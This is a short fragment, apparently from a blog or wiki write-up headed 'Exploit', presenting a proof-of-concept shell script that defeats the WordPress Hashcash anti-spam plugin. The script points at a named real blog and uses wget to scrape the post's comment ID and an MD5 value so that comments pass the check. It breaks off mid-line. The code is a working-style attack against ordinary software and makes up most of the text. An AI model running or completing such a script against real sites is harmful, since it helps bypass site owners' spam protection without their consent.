= Exploit = As a proof of concept, I wrote a shell script to break hashcash. It works on the author's own blog: [code] AUTHOR='test' EMAIL='test' URL='test' COMMENT='test' SITE='http://elliottback.com/wp' POST='/archives/2005/05/11/wordpress-hashcash-20/' CPID="$(wget -O - "$SITE$POST" 2>/dev/null | grep 'comment_post_ID' | cut -d'"' -f 14)" MD5="$(wget -O - "$SITE$POST" 2>/dev/null | grep '